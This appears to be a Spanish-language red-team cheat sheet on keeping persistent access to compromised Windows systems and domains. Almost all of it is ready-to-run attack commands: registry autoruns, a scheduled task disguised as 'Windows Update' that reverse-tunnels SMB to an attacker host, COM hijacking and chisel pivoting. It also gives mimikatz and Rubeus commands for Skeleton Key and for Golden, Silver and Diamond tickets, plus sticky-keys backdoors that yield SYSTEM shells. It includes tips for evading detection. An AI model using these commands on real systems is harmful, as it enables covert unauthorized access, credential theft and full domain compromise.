===========================================================
  T2 - 9. DESPLIEGUE DE PERSISTENCIA
===========================================================
Capas:
  - Sistemas internos
  - Servidores DMZ
  - Dominio interno
  - Cloud
  - Vectores alternativos (Wi-Fi, RDP "magico")

Stageless : payload completo en un binario (mas grande)
Staged    : payload inicial descarga el resto (mas discreto)

===========================================================
  PERSISTENCIA EN SISTEMAS - WINDOWS
===========================================================

--- BUENAS PRACTICAS ---
- MULTIPLES persistencias (red, usuario, ruta, proxy distintos)
- Binarios con nombre/fecha no llamativos
- Conexion al VPS con tiempo semi-aleatorio
- VPS sin shell, con certificado
- Solo UNA activa, las demas como backup

--- REGISTRY AUTORUN ---
# Anadir
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [NOMBRE] /t REG_SZ /d "[BINARIO]" /f

# Eliminar
reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v [NOMBRE]

# Listar
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run

# Variantes: Run, RunOnce  en HKCU y HKLM

--- TAREA PROGRAMADA ---
# Cada N minutos
schtasks /create /sc minute /mo [MINUTOS] /tn "[NOMBRE]" /tr "[COMANDO]"

# Como SYSTEM
schtasks /create /ru "SYSTEM" /sc minute /mo 10 /tn "Windows Update" /tr "C:\temp\plink.exe 10.1.1.22 -P 443 -C -R 3445:127.0.0.1:445 -N -l root -pw kali batch"

# Listar
schtasks /query /fo LIST /v

# Eliminar
schtasks /delete /tn "[NOMBRE]" /f

--- STARTUP FOLDER ---
# Por usuario
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\

# Todos los usuarios
%ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp\

--- COM HIJACKING ---
# Identificar con ProcMon objetos COM no resueltos:
#   - Operaciones RegOpenKey con NAME NOT FOUND
#   - Ruta termina en InprocServer32

# Ejemplo de creacion
reg add "HKCU\Software\Classes\CLSID\[GUID]\InprocServer32" /ve /d "C:\path\to\malicious.dll" /f
reg add "HKCU\Software\Classes\CLSID\[GUID]\InprocServer32" /v ThreadingModel /d "Both" /f

===========================================================
  SHARPCHISEL-NG (tunelizacion + persistencia)
===========================================================

--- SERVIDOR (VPS) ---
./chisel server -p [PUERTO-VPS] --keyfile "private" --auth "[USER]:[PASS]" -reverse --proxy "[URL-REDIRECCION]"

--- CLIENTE: REVERSE LOCAL FORWARD ---
SharpChisel-ng.exe client --auth [USER]:[PASS] [URL] R:[P-REMOTO]:[P-LOCAL]

--- CLIENTE: PROXY SOCKS ---
SharpChisel-ng.exe client --auth [USER]:[PASS] [URL] R:[PUERTO-VPS]:socks

# Luego desde el VPS:
proxychains nmap -sT [RANGO-INTERNO]

===========================================================
  PERSISTENCIA EN DOMINIO (privs elevados)
===========================================================

--- ACE / GROUP HIJACK ---
# Anadir usuario controlado a grupo privilegiado
Add-DomainGroupMember -Identity "[GRUPO]" -Member [USER] -Verbose

# Manipular ACL para WriteDACL/GenericAll
Add-DomainObjectAcl -TargetIdentity "[OBJETIVO]" -PrincipalIdentity [USER] -Rights All

--- DCSYNC BACKDOOR ---
# Conceder "Replicating Directory Changes" a usuario controlado
# (revisar BloodHound: GenericAll, WriteDACL)
mimikatz # lsadump::dcsync /domain:[FQDN] /user:[USER]

--- SKELETON KEY ---
# Patch en LSASS del DC -> cualquiera autentica con clave "mimikatz"
mimikatz # privilege::debug
mimikatz # misc::skeleton

# Acceso despues:
net use \\[DC]\c$ /user:[CUALQUIER-USUARIO] mimikatz

# (NO persiste tras reinicio del DC)

--- SILVER TICKET ---
# TGS firmado con la clave de la cuenta de maquina
# Solo da acceso a esa maquina+servicio
mimikatz # kerberos::golden /user:[USER] /domain:[FQDN] /sid:[SID-DOMINIO] /target:[MAQUINA] /service:[SERVICIO] /aes256:[AES256-MAQ$] /ticket:silver.kirbi

# Servicios comunes: cifs, host, http, ldap, mssqlsvc, rpcss, wsman

--- GOLDEN TICKET ---
# TGT firmado con clave de krbtgt -> acceso a todo el dominio
# Persiste mientras no se rote krbtgt 2 veces

mimikatz # kerberos::golden /user:[USER] /domain:[FQDN] /sid:[SID-DOMINIO] /aes256:[AES-KRBTGT] /ticket:golden.kirbi

# Inyectar
mimikatz # kerberos::ptt golden.kirbi

# Verificar
klist

--- DIAMOND TICKET (mas sigiloso) ---
# Modifica un TGT legitimo del DC -> evita detecciones de Golden
rubeus.exe diamond /krbkey:[AES-KRBTGT] /user:[USER] /password:[PASS] /enctype:aes /ticketuser:[USER-A-IMPERSONAR] /domain:[FQDN] /dc:[FQDN-DC] /ticketuserid:[RID] /groups:[GIDS] /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

===========================================================
  PERSISTENCIAS ALTERNATIVAS
===========================================================

--- REGEORG OCULTO EN DMZ ---
# Subir tunnel.aspx/jsp/php a un servidor en DMZ
# Acceso continuo sin tocar interno directamente

--- WI-FI HOSTED NETWORK ---
# Levantar AP desde la maquina comprometida
netsh wlan set hostednetwork mode=ALLOW ssid=[NOMBRE] key=[CLAVE] keyUsage=PERSISTENT
netsh wlan start hostednetwork

# Estado
netsh wlan show hostednetwork

--- FORZAR CLIENTE A RED DEL ATACANTE ---
netsh wlan connect ssid=[NOMBRE] name=[NOMBRE-INTERFAZ]

===========================================================
  STICKY KEYS / ACCESIBILIDAD (RDP sin sesion)
===========================================================
# Reemplazar Debugger de binarios accesibles desde login

--- SETHC.EXE (5x SHIFT) ---
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

# En el login RDP -> pulsar SHIFT 5 veces -> CMD como SYSTEM

--- OTROS BINARIOS ---
Utilman.exe   : Win + U
Magnify.exe   : Win + Plus / Minus
Narrator.exe  : Win + Ctrl + N
Atbroker.exe  : Win + X

# Mismo registro, distinto nombre de binario
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
